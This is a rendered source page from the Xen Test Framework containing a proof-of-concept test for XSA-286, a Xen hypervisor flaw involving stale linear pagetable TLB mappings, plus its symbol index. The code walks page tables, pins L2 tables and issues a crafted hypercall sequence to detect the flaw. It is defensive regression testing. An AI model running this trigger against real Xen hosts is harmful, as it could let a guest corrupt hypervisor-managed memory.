docs/xtf/xsa-286_2main_8c_source.html

 #include <xtf.h>

 const char test_title[] = "XSA-286 PoC";

 static intpte_t l1t1[L1_PT_ENTRIES] __page_aligned_bss;
 static intpte_t l1t2[L1_PT_ENTRIES] __page_aligned_bss;
 static intpte_t l2t1[L2_PT_ENTRIES] __page_aligned_bss;
 static intpte_t l2t2[L2_PT_ENTRIES] __page_aligned_bss;

 void test_main(void)
 {
     intpte_t *l3t;
     unsigned int slot = 1;
     int rc;

     /* Walk pagetables to L3. */
     if ( IS_DEFINED(CONFIG_64BIT) )
     {
         intpte_t *l4t = _p(pv_start_info->pt_base);

         l3t = maddr_to_virt(pte_to_paddr(l4t[0]));
     }
     else
         l3t = _p(pv_start_info->pt_base);

     /*
      * Prepare l*t*[].  Point each L2[0] at the appropriate L1, and pin the
      * L2's to get all of the type reference handling in Xen out of the way.
      */
     l2t1[0] = pte_from_virt(l1t1, PF_SYM(AD, RW, P));
     l2t2[0] = pte_from_virt(l1t2, PF_SYM(AD, RW, P));

     if ( hypercall_update_va_mapping(
              _u(l1t1), pte_from_virt(l1t1, PF_SYM(AD, P)), 0) )
         return xtf_error("Error: Can't remap l1t1 as R/O\n");
     if ( hypercall_update_va_mapping(
              _u(l1t2), pte_from_virt(l1t2, PF_SYM(AD, P)), 0) )
         return xtf_error("Error: Can't remap l1t2 as R/O\n");
     if ( hypercall_update_va_mapping(
              _u(l2t1), pte_from_virt(l2t1, PF_SYM(AD, P)), 0) )
         return xtf_error("Error: Can't remap l2t1 as R/O\n");
     if ( hypercall_update_va_mapping(
              _u(l2t2), pte_from_virt(l2t2, PF_SYM(AD, P)), 0) )
         return xtf_error("Error: Can't remap l2t2 as R/O\n");

     mmuext_op_t mux[] = {
         {
             .cmd = MMUEXT_PIN_L2_TABLE,
             .arg1.mfn = virt_to_mfn(l2t1),
         },
         {
             .cmd = MMUEXT_PIN_L2_TABLE,
             .arg1.mfn = virt_to_mfn(l2t2),
         },
     };

     rc = hypercall_mmuext_op(mux, ARRAY_SIZE(mux), NULL, DOMID_SELF);
     if ( rc )
         return xtf_error("Error: Can't pin l2t*[]\n");

     /*
      * The test depends on retaining stale TLB mappings to spot the
      * vulnerability.  This can race with interrupt handling and rescheduling.
      * Repeat it several times in quick succession.
      */
     for ( int i = 0; i < 15; ++i )
     {
         /* Reset.  Map l2t1 into l3[slot], clear l1t{1,2}[0]. */
         mmu_update_t mu[] = {
             {
                 .ptr = virt_to_maddr(&l3t[slot]),
                 .val = pte_from_virt(l2t1, PF_SYM(AD, RW, P)),
             },
             {
                 .ptr = virt_to_maddr(&l1t1[0]),
                 .val = 0,
             },
             {
                 .ptr = virt_to_maddr(&l1t2[0]),
                 .val = 0,
             },
         };

         rc = hypercall_mmu_update(mu, ARRAY_SIZE(mu), NULL, DOMID_SELF);
         if ( rc )
             return xtf_error("Error: Can't reset mapping state: %d\n", rc);

         unsigned long addr = slot << L3_PT_SHIFT;

         /*
          * Multicall comprising:
          *
          * - update_va_mapping(addr, 0, INLVPG)
          * - mmu_update(&l3t[slot], l2t2)
          * - update_va_mapping(addr, gfn0 | AD|WR|P, INLVPG)
          */
         mu[0].val = pte_from_virt(l2t2, PF_SYM(AD, RW, P));
         intpte_t nl1e = pte_from_gfn(pfn_to_mfn(0), PF_SYM(AD, RW, P));
         multicall_entry_t multi[] = {
             {
                 .op = __HYPERVISOR_update_va_mapping,
                 .args = {
                     addr,
                     0,
 #ifdef __i386__
                     0,
 #endif
                     UVMF_INVLPG,
                 },
             },
             {
                 .op = __HYPERVISOR_mmu_update,
                 .args = {
                     _u(mu),
                     1,
                     _u(NULL),
                     DOMID_SELF,
                 },
             },
             {
                 .op = __HYPERVISOR_update_va_mapping,
                 .args = {
                     addr,
                     (unsigned long)nl1e,
 #ifdef __i386__
                     nl1e >> 32,
 #endif
                     UVMF_INVLPG,
                 },
             },
         };

         rc = hypercall_multicall(multi, ARRAY_SIZE(multi));
         if ( rc )
             return xtf_error("Error: multicall failed: %d\n", rc);

         /*
          * If Xen retained a stale TLB mapping, then l1t1[0] will have been
          * edited, despite l1t2[0] being the correct entry to have editied.
          */
         if ( l1t1[0] )
             return xtf_failure("Fail: Xen retained stale linear pt mapping\n");
     }

     xtf_success("Success: Probably not vulnerable to XSA-286\n");
 }

 /*
  * Local variables:
  * mode: C
  * c-file-style: "BSD"
  * c-basic-offset: 4
  * tab-width: 4
  * indent-tabs-mode: nil
  * End:
  */
L1_PT_ENTRIES
#define L1_PT_ENTRIES
Definition: page.h:69

IS_DEFINED
#define IS_DEFINED(x)
Evalute whether the CONFIG_ token x is defined.
Definition: macro_magic.h:67

hypercall_update_va_mapping
static long hypercall_update_va_mapping(unsigned long linear, uint64_t npte, enum XEN_UVMF flags)
Definition: hypercall.h:115

ARRAY_SIZE
#define ARRAY_SIZE(a)
Definition: lib.h:8

__page_aligned_bss
#define __page_aligned_bss
Definition: compiler.h:37

pte_to_paddr
paddr_t pte_to_paddr(intpte_t pte)

pfn_to_mfn
unsigned long pfn_to_mfn(unsigned long pfn)

pte_from_virt
intpte_t pte_from_virt(const void *va, uint64_t flags)

_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53

l1t2
static intpte_t l1t2[L1_PT_ENTRIES]
Definition: main.c:42

pte_from_gfn
intpte_t pte_from_gfn(unsigned long gfn, uint64_t flags)

virt_to_maddr
uint64_t virt_to_maddr(const void *va)

hypercall_multicall
static long hypercall_multicall(struct multicall_entry *list, unsigned int nr)
Definition: hypercall.h:105

PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108

mmu_update::ptr
uint64_t ptr
Definition: xen.h:249

mmu_update
Definition: xen.h:245

virt_to_mfn
unsigned long virt_to_mfn(const void *va)

NULL
#define NULL
Definition: stddef.h:12

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

l2t1
static intpte_t l2t1[L2_PT_ENTRIES]
Definition: main.c:43

l1t1
static intpte_t l1t1[L1_PT_ENTRIES]
Definition: main.c:41

UVMF_INVLPG
Definition: xen.h:383

multicall_entry
Definition: xen.h:263

xen_pv_start_info::pt_base
unsigned long pt_base
Definition: xen.h:223

MMUEXT_PIN_L2_TABLE
#define MMUEXT_PIN_L2_TABLE
Definition: xen.h:334

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137

hypercall_mmu_update
static long hypercall_mmu_update(const mmu_update_t reqs[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:60

mmuext_op
Definition: xen.h:355

maddr_to_virt
void * maddr_to_virt(uint64_t maddr)

l2t2
static intpte_t l2t2[L2_PT_ENTRIES]
Definition: main.c:44

intpte_t
unsigned long intpte_t
Definition: page.h:152

test_title
const char test_title[]
The title of the test.
Definition: main.c:14

L2_PT_ENTRIES
#define L2_PT_ENTRIES
Definition: page.h:70

__HYPERVISOR_mmu_update
#define __HYPERVISOR_mmu_update
Definition: xen.h:15

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

hypercall_mmuext_op
static long hypercall_mmuext_op(const mmuext_op_t ops[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:148

__HYPERVISOR_update_va_mapping
#define __HYPERVISOR_update_va_mapping
Definition: xen.h:27

multi
static multicall_entry_t multi[]
Definition: main.c:107

pv_start_info
xen_pv_start_info_t * pv_start_info
Definition: traps.c:14

mmuext_op::cmd
unsigned int cmd
Definition: xen.h:356

DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70

multicall_entry::op
unsigned long op
Definition: xen.h:264

mmu_update::val
uint64_t val
Definition: xen.h:250